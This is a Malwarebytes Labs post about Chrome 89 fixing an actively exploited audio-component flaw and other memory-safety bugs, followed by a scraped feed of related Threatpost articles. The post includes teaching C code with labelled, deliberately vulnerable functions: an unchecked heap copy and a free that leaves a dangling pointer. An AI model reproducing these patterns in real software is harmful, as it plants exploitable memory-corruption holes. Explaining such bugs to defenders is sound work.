The Microsoft Browser Vulnerability Research team found and reported a vulnerability in the audio component of Google Chrome. Google has fixed this high-severity vulnerability ([CVE-2021-21166](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21166>)) in Chrome 89.0.4389.72 and is warning Chrome users that an exploit for it exists in the wild. It is [not the first time](<https://www.tenable.com/blog/cve-2019-13720-use-after-free-zero-day-in-google-chrome-exploited-in-the-wild>) that Chrome's audio component has been targeted by an exploit.
### No details available
Further details about the vulnerability are being withheld until a majority of Chrome users have updated to the patched version. What we do know is that it is an object lifecycle issue in the browser's audio component, that it was reported on February 11 by Alison Huffman of the Microsoft Browser Vulnerability Research team, and that the same researcher reported a second object lifecycle bug in the audio component (CVE-2021-21165) that is fixed in the same release.
An object lifecycle, in object-oriented programming, is the span between an object's creation and its destruction. Only inside that span is the object valid. Code that keeps a reference to an object and uses it after the object has been destroyed, or that destroys the same object twice, is operating on memory the allocator may already have reused for something else.
When the lifecycle is managed correctly, memory is allocated when the object is created and released exactly once when it is destroyed. When it is mismanaged, the most common result is a use-after-free: the memory is released while a pointer to it is still live, and that pointer is later dereferenced. An attacker who can control what the freed memory gets reused for can often turn that into a crash or, with more work, code execution. That is what makes an "object lifecycle issue" a high-severity flaw rather than a mere memory leak.
### More vulnerabilities patched in the update
As usual, Google patched a number of other vulnerabilities in the same update: 47 security fixes in total, eight of them rated high severity. The other high-severity ones:
Google said that it fixed three heap-buffer overflow flaws in the TabStrip ([CVE-2021-21159](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21159>), [CVE-2021-21161](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21161>)) and WebAudio ([CVE-2021-21160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21160>)) components. A high-severity use-after-free error ([CVE-2021-21162](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21162>)) was found in WebRTC. Two other high-severity flaws are an insufficient data validation issue in Reader Mode ([CVE-2021-21163](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21163>)) and an insufficient data validation issue in Chrome for iOS ([CVE-2021-21164](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21164>)).
### The CVEs
Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).
* CVE-2021-21159, CVE-2021-21161: Heap buffer overflow in TabStrip. The heap is the region of a process's memory used for allocations whose size or lifetime is not known at compile time (malloc/new in C and C++). A heap buffer overflow occurs when code writes more data into a heap allocation than it can hold, so the excess spills into whatever sits next to it: another object's fields, or the allocator's own bookkeeping. The stack and the heap are the two areas exploit code most commonly targets with overflows; heap overflows are typically exploited by arranging ("grooming") allocations so that a useful object lands directly after the buffer being overflowed.
* CVE-2021-21160: Heap buffer overflow in WebAudio.
* CVE-2021-21162: Use after free in WebRTC. A use-after-free (UAF) happens when a program frees a block of dynamic memory but keeps using a pointer to it (a "dangling" pointer). Because the allocator may hand that same block to the next allocation, an attacker who can trigger allocations of chosen size and content can replace the freed object with data of their choosing, after which the stale pointer operates on attacker-controlled memory. WebRTC is the browser component that lets web applications set up real-time audio, video and data connections.
* CVE-2021-21163: Insufficient data validation in Reader Mode. Insufficient data validation means the code acts on input without first checking that it is well-formed and within expected bounds, so specially crafted input can push the program into a state its authors never intended.
* CVE-2021-21164: Insufficient data validation in Chrome for iOS.
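The three bug classes above (object lifecycle, heap buffer overflow, use-after-free) in one small C program. This is an added illustration written for this post, not Chrome code and not a reconstruction of any of the CVEs: the `audio_buffer` and `player` types, the sample data and the function names are all invented for the example. Each vulnerable routine sits next to its hardened form, and `example()` walks the hardened paths end to end.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/* Toy stand-in for a decoder's output buffer: a fixed-capacity sample array
 * on the heap. Constructed for this example, not Chrome's code. */
typedef struct {
    size_t capacity;   /* samples the allocation can hold */
    size_t length;     /* samples written so far; invariant: length <= capacity */
    int16_t *samples;  /* heap block of exactly `capacity` samples */
} audio_buffer;

audio_buffer *audio_buffer_new(size_t capacity) {
    audio_buffer *b = calloc(1, sizeof *b);
    if (b == NULL) return NULL;
    b->samples = calloc(capacity, sizeof *b->samples);
    if (b->samples == NULL) { free(b); return NULL; }
    b->capacity = capacity;
    return b;
}

void audio_buffer_free(audio_buffer *b) {
    if (b == NULL) return;
    free(b->samples);
    free(b);
}

/* The bounds check in pure form. Subtracting first avoids the wrap-around
 * that `length + count` could produce with an attacker-chosen `count`. */
int would_overflow(size_t capacity, size_t length, size_t count) {
    return count > capacity - length;
}

/* VULNERABLE: trusts the caller's `count`. A value larger than the free space
 * writes past the end of the heap block into whatever neighbours it: the
 * heap-buffer-overflow class of CVE-2021-21159/21160/21161. Kept only for
 * comparison; never call it with an unchecked count. */
void append_unchecked(audio_buffer *b, const int16_t *src, size_t count) {
    memcpy(b->samples + b->length, src, count * sizeof *src);
    b->length += count;
}

/* FIXED: refuse anything that does not fit; the caller must handle -1. */
int append_checked(audio_buffer *b, const int16_t *src, size_t count) {
    if (would_overflow(b->capacity, b->length, count)) return -1;
    memcpy(b->samples + b->length, src, count * sizeof *src);
    b->length += count;
    return 0;
}

/* A player holds a non-owning pointer to the buffer it renders. The lifecycle
 * question: what happens to that pointer when the buffer is destroyed? */
typedef struct { audio_buffer *current; } player;

/* VULNERABLE: frees the buffer but leaves `current` dangling. A later
 * player_read_sample() touches freed memory that the allocator may already
 * have handed to an attacker-controlled allocation: a use-after-free, the
 * class of CVE-2021-21162 and of "object lifecycle" bugs generally. */
void player_stop_unsafe(player *p) {
    audio_buffer_free(p->current);
}

/* FIXED: the reference is cleared in the same step that destroys the object,
 * so late callers see "no buffer" instead of stale memory. */
void player_stop_safe(player *p) {
    audio_buffer_free(p->current);
    p->current = NULL;
}

/* Reads sample `i`; 0 on success, -1 if there is no live buffer or `i` is out
 * of range. The NULL check is what makes the fixed stop() safe. */
int player_read_sample(const player *p, size_t i, int16_t *out) {
    if (p->current == NULL || i >= p->current->length) return -1;
    *out = p->current->samples[i];
    return 0;
}

/* Walks the hardened paths end to end; returns 0 if every expectation holds,
 * otherwise the number of the first failed step. */
int example(void) {
    const int16_t chunk[3] = {100, -200, 300};  /* constructed sample data */
    int16_t out = 0;
    audio_buffer *b = audio_buffer_new(4);
    if (b == NULL) return 1;
    player p = { b };
    if (append_checked(b, chunk, 3) != 0 || b->length != 3) return 2;
    if (append_checked(b, chunk, 2) != -1 || b->length != 3) return 3; /* 1 slot left */
    if (append_checked(b, chunk, 1) != 0 || b->length != 4) return 4;
    if (player_read_sample(&p, 1, &out) != 0 || out != -200) return 5;
    player_stop_safe(&p);                                /* buffer gone, pointer cleared */
    if (p.current != NULL) return 6;
    if (player_read_sample(&p, 0, &out) != -1) return 7; /* a UAF after player_stop_unsafe */
    return 0;
}

int main(void) {
    int rc = example();
    if (rc == 0) puts("all checks held"); else printf("check %d failed\n", rc);
    return rc;
}
```

Two design points carry over to real code: the length check subtracts before comparing so a huge `count` cannot wrap the arithmetic, and the object that owns a buffer is the one that clears every reference it handed out, which is the discipline that Chrome's own lifecycle fixes generally restore.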
When more details about the vulnerabilities come to light it's possible that more exploits for them will be found in the wild. It depends a lot on how easy they are to abuse, and how big the possible impact can be. But with one already being used in the wild, it is advisable to update now.
### How to update
The easiest way to do it is to let Chrome update automatically, which uses the same mechanism described below but does not require your attention. The catch is that a downloaded update is only applied when the browser restarts, so you can end up lagging behind if you never close Chrome, or if something interferes with the updater, such as an extension blocking it.
So, it doesn’t hurt to check now and then. And now would be a good time.
My preferred method is to have Chrome open the page **chrome://settings/help** which you can also find by clicking **Settings > About Chrome**.
If there is an update available, Chrome will notify you and start downloading it. Then it will tell you all you have to do to complete the update is **Relaunch** the browser.
_After the update your version should be 89.0.4389.72 or later._
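A version check for the fixed build, for anyone who has to verify this across more than one machine rather than by eye. This is an added example, not from the original post or from Google: the fixed build number is taken from the release note, the sample strings are constructed, and skipping a leading product name mirrors what `google-chrome --version` prints on Linux (an assumption about your platform's output format).

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* First Chrome build carrying the fix, from the release note. */
static const int FIXED_VERSION[4] = {89, 0, 4389, 72};

/* Parse a Chrome-style "MAJOR.MINOR.BUILD.PATCH" string into four ints.
 * Leading text such as the "Google Chrome " prefix from `google-chrome
 * --version` is skipped; trailing text is ignored. Returns 1 on success,
 * 0 if fewer than four numeric fields are present. */
int parse_chrome_version(const char *s, int out[4]) {
    while (*s != '\0' && !isdigit((unsigned char)*s)) s++;
    if (sscanf(s, "%d.%d.%d.%d", &out[0], &out[1], &out[2], &out[3]) != 4) return 0;
    for (int i = 0; i < 4; i++) if (out[i] < 0) return 0;
    return 1;
}

/* Field-by-field numeric comparison; returns <0, 0 or >0 like strcmp().
 * strcmp() itself is the wrong tool: as text, "89.0.4389.9" sorts after
 * "89.0.4389.72", so a vulnerable build would look patched. */
int compare_versions(const int a[4], const int b[4]) {
    for (int i = 0; i < 4; i++)
        if (a[i] != b[i]) return a[i] < b[i] ? -1 : 1;
    return 0;
}

/* 1 if `installed` is the fixed build or newer, 0 if it is older, -1 if the
 * string cannot be parsed (an unknown version is not a safe one). */
int chrome_is_patched(const char *installed) {
    int v[4];
    if (!parse_chrome_version(installed, v)) return -1;
    return compare_versions(v, FIXED_VERSION) >= 0 ? 1 : 0;
}

int main(void) {
    /* Constructed inputs in the shapes an inventory script will meet. */
    const char *samples[] = {
        "Google Chrome 89.0.4389.72",   /* exact fixed build */
        "Chromium 89.0.4389.90 snap",   /* later patch level */
        "88.0.4324.182",                /* previous stable: vulnerable */
        "89.0.4389.9",                  /* would pass a string compare */
        "unknown",                      /* not parseable */
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int r = chrome_is_patched(samples[i]);
        printf("%-30s -> %s\n", samples[i],
               r == 1 ? "patched" : r == 0 ? "VULNERABLE, update" : "unknown version");
    }
    return 0;
}
```

Feed it whatever your inventory tool reports as the Chrome version string; the one rule worth keeping from it is that an unparseable version is reported as unknown rather than as patched.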
Stay safe, everyone!
The post [Update now! Chrome fix patches in-the-wild zero-day](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/update-now-chrome-fix-patches-in-the-wild-zero-day/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).
{"threatpost": [{"lastseen": "2021-03-04T21:58:01", "description": "Google has fixed a high-severity vulnerability in its Chrome browser and is warning Chrome users that an exploit exists in the wild for the flaw.\n\nThe vulnerability is one of 47 security fixes that the tech giant rolled out on Tuesday in Chrome 89.0.4389.72, including patches for eight high-severity flaws.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe Chrome team is delighted to announce the promotion of Chrome 89 to the stable channel for Windows, Mac and Linux,\u201d according to Google [on Tuesday](<https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html>). \u201cThis will roll out over the coming days/weeks.\u201d\n\n## Google Chrome: Actively-Exploited Security Flaw\n\nThe actively-exploited vulnerability in question (CVE-2021-21166) stems from the audio component of the browser (which [has previously been found](<https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/>) to have various security issues in the past). According to Google, the flaw stems from an object lifecycle issue. The object lifecycle is the duration in which a programming language object is valid for use \u2013 between the time it is created and destroyed.\n\nBeyond Google noting that it \u201cis aware of reports that an exploit for CVE-2021-21166 exists in the wild,\u201d further information about the glitch is unavailable. That\u2019s because \u201caccess to bug details and links may be kept restricted until a majority of users are updated with a fix,\u201d according to Google.\n\nThe flaw was reported by Alison Huffman, with the Microsoft Browser Vulnerability Research team, on Feb. 11. 
Huffman reported another high-severity flaw that Google fixed in Chrome, which also stemmed from an object lifecycle issue in the audio component (CVE-2021-21165).\n\n## Other Chrome Security High-Severity Flaws\n\nDetails around the other high-severity vulnerabilities patched by Google in Chrome remain scant. However, Google said that it fixed three heap-buffer overflow flaws in the TabStrip (CVE-2021-21159, CVE-2021-21161) and WebAudio (CVE-2021-21160) components. A high-severity use-after-free error (CVE-2021-21162) was found in WebRTC.\n\nTwo other high-severity flaws include an insufficient data validation issue in Reader Mode (CVE-2021-21163) and an insufficient data validation issue in Chrome for iOS (CVE-2021-21164).\n\n## **Google Chrome Security Updates**\n\nChrome will in many cases update to its newest version automatically, however security experts suggest that users double check that this has happened. To check if an update is available:\n\n * Google Chrome users can go to chrome://settings/help by clicking Settings > About Chrome\n * If an update is available Chrome will notify users and then start the download process\n * Users can then relaunch the browser to complete the update\n\nThe fixes come after Google in February [warned of a zero-day vulnerability](<https://threatpost.com/google-chrome-zero-day-windows-mac/163688/>) in its V8 open-source web engine that\u2019s being actively exploited by attackers. In January, the Cybersecurity and Infrastructure Security Agency (CISA) [urged Windows, macOS and Linux users](<https://threatpost.com/firefox-chrome-edge-bugs-system-hijacking/162873/>) of Google\u2019s Chrome browser to patch an out-of-bounds write bug (CVE-2020-15995) impacting the current 87.0.4280.141 version of the software.\n\nAnd in December, Google updated Chrome to fix four bugs with a severity rating of \u201chigh\u201d and eight overall. 
[Three were use-after-free flaws](<https://threatpost.com/google_chrome_bugs_patched/161907/>), which could allow an adversary to generate an error in the browser\u2019s memory, opening the door to a browser hack and host computer compromise.\n", "cvss3": {}, "published": "2021-03-03T21:17:14", "type": "threatpost", "title": "Google Patches Actively Exploited Flaw in Chrome Browser", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-15995", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166"], "modified": "2021-03-03T21:17:14", "id": "THREATPOST:A8D4979B3A84B8E7B98B5321FA948454", "href": "https://threatpost.com/google-patches-actively-exploited-flaw-in-chrome-browser/164468/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-03T22:09:38", "description": "The ObliqueRAT malware is now cloaking its payloads as seemingly-innocent image files that are hidden on compromised websites.\n\nThe remote access trojan (RAT), which has been operating since 2019, spreads via emails, which have malicious Microsoft Office documents attached. Previously, payloads were embedded into the documents themselves. 
Now, if users click on the attachment, they\u2019re redirected to malicious URLs where the payloads are hidden with steganography.\n\nResearchers warn that this new tactic has been seen helping ObliqueRAT operators to avoid detection during the malware\u2019s targeting of various organizations in South Asia \u2014 where the goal is to ultimately sends victims an email with malicious Microsoft Office documents, which, once clicked, fetch the payloads and ultimately exfiltrate various data from the victim.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis new campaign is a typical example of how adversaries react to attack disclosures and evolve their infection chains to evade detections,\u201d said Asheer Malhotra, researcher with Cisco Talos, [on Tuesday](<https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html>). \u201cModifications in the ObliqueRAT payloads also highlight the usage of obfuscation techniques that can be used to evade traditional signature-based detection mechanisms.\u201d\n\n## **What is the ObliqueRAT Malware?**\n\n[The known activity for ObliqueRAT](<https://blog.talosintelligence.com/2020/02/obliquerat-hits-victims-via-maldocs.html>) dates back to November 2019, part of a campaign targeting entities in Southeast Asia and uncovered by Cisco Talos researchers in February 2020. ObliqueRAT operators have always used emails with malicious attachments as an initial infection vector. Generally the infection chain uses an initial executable, which acts as a dropper for ObliqueRAT itself.\n\nOnce it infected systems, ObliqueRAT exfiltrates various information, including system data, a list of drives and a list of running processes.\n\n## **ObliqueRAT Malware Evolution**\n\nThe newly discovered ObliqueRAT attack chain was part of a campaign that started in May last year \u2013 but which was only recently uncovered by researchers. 
In addition to the use of URL redirects, the payloads themselves have also been given an update, now consisting of seemingly benign bitmap image files (BMP).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/03/02102115/ObliqueRAT-Payloads.png>)\n\nThe new attack chain used by ObliqueRAT. Credit: Cisco Talos\n\nThe image files contain both legitimate image data and malicious executable bytes concealed in the image data, said researchers. Threatpost has reached out to Cisco Talos for further information on the compromised websites and the images used as part of the attack.\n\nThis is a well-known tactic used by [threat actors, called steganography](<https://threatpost.com/steganography-pinpoint-attacks-industrial-targets/156151/>). Attackers hide malware in image files as a way to circumvent detection. That\u2019s because many filters and gateways [let image file formats pass without too much scrutiny](<https://threatpost.com/rare-steganography-hack-can-compromise-fully-patched-websites/146701/>).\n\nThe initial email sent to victims contains malicious documents with new macros, which redirect users to the malicious URLs containing these payloads. The malicious macros consequently download the BMP files, and the ObliqueRAT payload is extracted to the disk.\n\nThere are slight variations that have been seen in real-world attacks. One instance of a malicious document that researchers found \u201cuses a similar technique, with the difference being that the payload hosted on the compromised website is a BMP image containing a .ZIP file that contains ObliqueRAT payload,\u201d said Malhotra. \u201cThe malicious macros are responsible for extracting the .ZIP and subsequently the ObliqueRAT payload on the endpoint.\u201d\n\nDuring the course of their investigation, researchers also discovered three previously used but never-before-seen payloads for ObliqueRAT, which showed how the malware authors have made changes over time. 
For instance, one of the versions created in September added new file enumeration and stealing capabilities, as well as expanded the payload\u2019s functionalities to include the ability to take webcam and desktop screenshots and recordings.\n\n## **ObliqueRAT: Hiding From Detection, Improved Persistence**\n\nThis updated payload delivery technique gives attackers a leg up in sidestepping detection, said researchers.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/03/02102156/ObliqueRAT-Payloads-2.png>)\n\nThe evolution of ObliqueRAT\u2019s payloads. Credit: Cisco Talos\n\n\u201cIt is highly likely that these changes are in response to previous disclosures to achieve evasion for these new campaigns,\u201d they said. \u201cThe usage of compromised websites is another attempt at detection evasion.\u201d\n\nThe macros also have adopted a new tactic for achieving reboot persistence for the ObliqueRAT payloads. This is accomplished by creating a shortcut (.URL file extension) in the infected user\u2019s Startup directory, said researchers. Once the computer reboots, the payloads will then still be able to run.\n\n## **RevengeRAT: Researchers Link With \u2018Low Confidence\u2019**\n\nResearchers said that they observed overlaps in the command-and-control (C2) server infrastructure between ObliqueRAT and a RevengeRAT campaign. However, they only made the connection with \u201clow confidence\u201d due to lack of any other more substantial evidence.\n\nRevengeRAT is a [commodity malware family](<https://threatpost.com/malware-dropper-dual-rats/150271/>) that [has been used](<https://threatpost.com/iranian-apt33-shakes-up-cyberespionage-tactics/146041/>) by Iran-linked, espionage-focused [threat group APT33](<https://threatpost.com/apt33-mounts-targeted-botnet-attacks-us/150248/>) in the past. The RAT collects and exfiltrates information from the victim\u2019s system.\n\nPreviously, researchers also made links between ObliqueRAT and Crimson RAT. 
The functionalities of Crimson RAT [include stealing credentials](<https://threatpost.com/apt36-taps-coronavirus-as-golden-opportunity-to-spread-crimson-rat/153776/>) from victims\u2019 browsers, capturing screenshots, collecting antivirus software information, and listing the running processes, drives and directories from victim machines. Researchers said that the two RATs shared \u201csimilar maldocs and macros\u201d in previous ObliqueRAT campaigns.\n\n\u201cThis malware has links to the Transparent Tribe group that has historically targeted entities in South Asia,\u201d Malhotra told Threatpost. \u201cAs is the case with most suspected APT campaigns, this campaign is also low volume. A low-volume campaign has better chances of remaining undiscovered for longer periods of time thus increasing the chances of success for the attackers.\u201d\n", "cvss3": {}, "published": "2021-03-02T17:06:51", "type": "threatpost", "title": "Compromised Website Images Camouflage ObliqueRAT Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21166"], "modified": "2021-03-02T17:06:51", "id": "THREATPOST:CF9E25BD324C5940B0795721CA134155", "href": "https://threatpost.com/website-images-obliquerat-malware/164395/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-04-24T20:49:12", "description": "As the COVID-19 pandemic continues to force in-person cybersecurity event cancellations, Kaspersky is forging ahead with a virtual security summit, SAS@home.\n\nTopics on [the agenda](<https://thesascon.com/SAS@home>) include threat intel on advanced persistent threats (APTs), new vulnerability research, and topics related to a post-crisis world \u2013 such as how the industry is changing because of the pandemic.\n\nThe online conference, scheduled for April 28-30, is meant to complement the firm\u2019s annual Security Analyst Summit (SAS). 
The in-person SAS event was originally scheduled for April in Barcelona, and will now take place in November \u2013 with SAS@home providing an opportunity for the community to come together and share insights and research in the meantime.\n\nExperts from across the IT security industry will present three days of knowledge sharing, [pecha-kucha moments](<https://www.pechakucha.com/>), \u201cfireside chats\u201d and Master Class training sessions. The sessions will be presented live, free to all participants via the ON24 webinar platform, with on-demand replays available after the fact. The event will run each day from 11 a.m. to 1 p.m. ET.\n\n\u201c[Attendees] will enjoy a unique opportunity to chat online and learn from some of the world\u2019s leading cybersecurity researchers and influencers in a welcoming atmosphere, while also taking a deep dive into a top-notch program of topical presentations typical for the regular SAS,\u201d Kaspersky said in a media statement.\n\nPresentations will cover new, unpublished research as well as the latest evolutions of known trends. For instance, \u201cHiding in Plain Sight: An APT Comes into a Market\u201d on Tuesday will feature Kaspersky researchers Alexey Firsh and Lev Pikman opening the kimono on previously undisclosed threat intelligence regarding a nation-state cybercriminal group.\n\nMeanwhile, \u201cZero-day Exploits of Operation WizardOpium,\u201d also on Tuesday, will feature Kaspersky researchers Anton Ivanov and Boris Larin offering a deep dive and new information regarding the weapons arsenal of a sophisticated threat group. The group shares characteristics with known APTs like DarkHotel and Lazarus Group \u2013 but has evaded any serious attribution attempts. 
WizardOpium attacks [were seen in November](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) using a zero-day for Google\u2019s Chrome browser (CVE-2019-13720) and [in December](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>) exploiting yet another to gain elevation-of-privilege (CVE-2019-1458) on targets as well as to escape the Chrome process sandbox.\n\nAlso of note in the agenda are presentations from third-party researchers, including Joe FitzPatrick, researcher with Securing Hardware; Ryan Naraine, director of security strategy at Intel; Sounil Yu, CISO in residence at YL Ventures; and Alex Frappier, director of strategic partnerships with the CanCyber Foundation. Other third-party speakers are to be announced.\n\nFitzPatrick, who [spoke at last year\u2019s SAS event](<https://threatpost.com/sas-2019-joe-fitzpatrick-warns-of-the-5-supply-chain-attack/143684/>) in Singapore, will use his session on Tuesday, \u201cHardware Hacking Under Quarantine,\u201d to show off almost a dozen unique avenues where an attacker might access PCI express interfaces in a computer\u2019s hardware in order to mount a [direct memory access (DMA) attack](<https://threatpost.com/rambleed-side-channel-privileged-memory/145629/>) on the target system.\n\n\u201cUp to this point the majority of the research has been done against laptop, desktop and server systems through full-size PCI express ports or Thunderbolt ports,\u201d FitzPatrick told Threatpost. \u201cI quickly show a bunch of places, including on smaller embedded devices, where this can also be done.\u201d\n\nFitzPatrick\u2019s session will be in a pecha-kucha 20\u00d720 presentation format, where the speaker shows 20 images, each for 20 seconds, to tell a 400-second story with visuals guiding the way. 
Another pecha-kucha presentation will come from Kaspersky\u2019s David Jacoby, who [also spoke at last year\u2019s event](<https://threatpost.com/social-engineering-telcos-phone-hijacking/144495/>). For SAS@home, he\u2019ll be presenting on \u201cHow Does COVID-19 Affect the Internet?\u201d on Wednesday.\n\nCanCyber\u2019s Frappier meanwhile will be giving a deep-dive training Master Class on Thursday on the importance of body language. Specifically, he\u2019ll be discussing how red teams can use an understanding of nonverbal cues as a way to increase their chances of success while making impersonation or [\u201cvishing\u201d attacks](<https://threatpost.com/romanian-hackers-extradited-to-u-s-over-18m-vishing-scam/131763/>).\n\nFrappier told Threatpost that the subject is important in the context of today\u2019s threat landscape given that falling for social-engineering attacks is an enduring issue, and at the same time, video has become an important communication avenue in today\u2019s challenging times.\n\n\u201cWe have a difficult time reading people, and our adversaries are aware of this,\u201d he told Threatpost. \u201cYet, this is a two-way street. Better reading and understanding of the nonverbal will make us better at detecting important threats. Better encoding for our nonverbal message will allow us to become better communicators. We will get our message across and will get buy-in from managers and commercial partners.\u201d\n\nAs for the other planned sessions, Intel\u2019s Naraine will offer a Tuesday fireside chat on what cybersecurity could look like in a post-crisis world, on the other side of the pandemic. 
Kaspersky\u2019s Costin Raiu meanwhile will offer another Master Class (topic to be determined) on Wednesday; and on Thursday, Igor Kuznetsov of Kaspersky will present a session on \u201cStatic Binary Analysis: The Essentials.\u201d\n\nThe agenda will also feature a few surprise guests, according to conference organizers.\n\nYou can keep up with the event via Threatpost, which will be providing daily reports on the virtual conference.\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "cvss3": {}, "published": "2020-04-24T20:44:05", "type": "threatpost", "title": "SAS@Home Virtual Summit Showcases New Threat Intel, Industry Changes", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "modified": "2020-04-24T20:44:05", "id": "THREATPOST:230DF95E70EB9C4F372C198798822D19", "href": "https://threatpost.com/sashome-virtual-summit-showcases-threat-intel/155128/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-09T22:42:49", "description": "UPDATE\n\nGoogle is warning users of a high-severity vulnerability in its Chrome browser that is currently being exploited by attackers to hijack computers.\n\nThe flaw ([CVE-2019-13720](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-13720>)), discovered by security researchers Anton Ivanov and Alexey Kulaev at Kaspersky, exists in Google Chrome\u2019s audio component. 
Google is urging users to update to the latest version of Chrome, 78.0.3904.87 (for Windows, Mac, and Linux) as it rolls out over the coming days.\n\n\u201cThis [updated] version addresses vulnerabilities that an attacker could exploit to take control of an affected system,\u201d according to a Thursday Cybersecurity and Infrastructure Security Agency [(CISA) alert](<https://www.us-cert.gov/ncas/current-activity/2019/10/31/google-releases-security-updates-chrome>). \u201cOne of these vulnerabilities (CVE-2019-13720) was detected in exploits in the wild.\u201d\n\nThe bug (CVE-2019-13720) is a use-after-free flaw, which is a memory corruption flaw where an attempt is made to access memory after it has been freed. This can cause an array of malicious impacts, from causing a program to crash, to potentially leading to execution of arbitrary code \u2013 or even enable full remote code execution capabilities.\n\nCostin Raiu, director of Global Research and Analysis Team at Kaspersky, [wrote on Twitter](<https://twitter.com/craiu/status/1190260465139691522>) \u201ca few days ago our technologies caught a new Chrome 0day exploit used in the wild and we reported it to Google.\u201d\n\n> A few days ago our technologies caught a new Chrome 0day exploit used in the wild and we reported it to Google. Just released-Chrome 78 patches it, credits to my colleagues [@antonivanovm](<https://twitter.com/antonivanovm?ref_src=twsrc%5Etfw>) and Alexey Kulaev for finding the bug. <https://t.co/Bgm0QtNO2d>\n> \n> \u2014 Costin Raiu (@craiu) [November 1, 2019](<https://twitter.com/craiu/status/1190260465139691522?ref_src=twsrc%5Etfw>)\n\nKaspersky researchers are calling the exploits [Operation WizardOpium](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>). 
The attack leveraged a watering-hole-style injection on a Korean-language news portal, they said.\n\nMalicious JavaScript code was inserted in the main page, which then loaded a profiling script from a remote site. Researchers said that the exploit \u201cused a race condition bug between two threads due to missing proper synchronization between them. It gives an attacker a Use-After-Free condition that is very dangerous because it can lead to code execution scenarios.\u201d\n\n\u201cSo far, we have been unable to establish a definitive link with any known threat actors,\u201d they said in a Friday analysis. \u201cThere are certain very weak code similarities with Lazarus attacks, although these could very well be a false flag. The profile of the targeted website is more in line with earlier [DarkHotel](<https://securelist.com/the-darkhotel-apt/66779/>) attacks that have recently deployed similar false flag attacks.\u201d\n\nGoogle and researchers are intentionally remaining tight-lipped. \u201cAccess to bug details and links may be kept restricted until a majority of users are updated with a fix,\u201d according to [Google\u2019s alert](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html>). \u201cWe will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven\u2019t yet fixed,\u201d Google said in its advisory.\n\n[Use-after-free flaws](<https://threatpost.com/tag/use-after-free/>) have plagued Google\u2019s Chrome browser recently. 
In [August](<https://threatpost.com/google-high-severity-blink-browser-engine-flaw/147770/>), Google disclosed a high-severity use-after-free vulnerability (CVE-2019-5869) in Blink, an open-source [browser engine](<https://www.chromium.org/blink>) that powers the Google Chrome browser, that could enable remote attackers to execute code and carry out other malicious attacks.\n\nGoogle on Thursday also disclosed another high-severity vulnerability (CVE-2019-13721) in PDFium, an open-source software library for viewing and searching PDF documents that was developed by Foxit and Google.\n\nThis flaw is also a use-after-free vulnerability, but there are no reports of it being exploited in the wild. It was disclosed by a researcher under the alias \u201cbanananapenguin,\u201d who received a $7500 bounty through Google\u2019s vulnerability disclosure program for the discovery.\n\n_This post was updated on Nov. 1 at 4pm EST to reflect further details about the detected exploit._\n\n_**What are the top mistakes leading to data breaches at modern enterprises? 
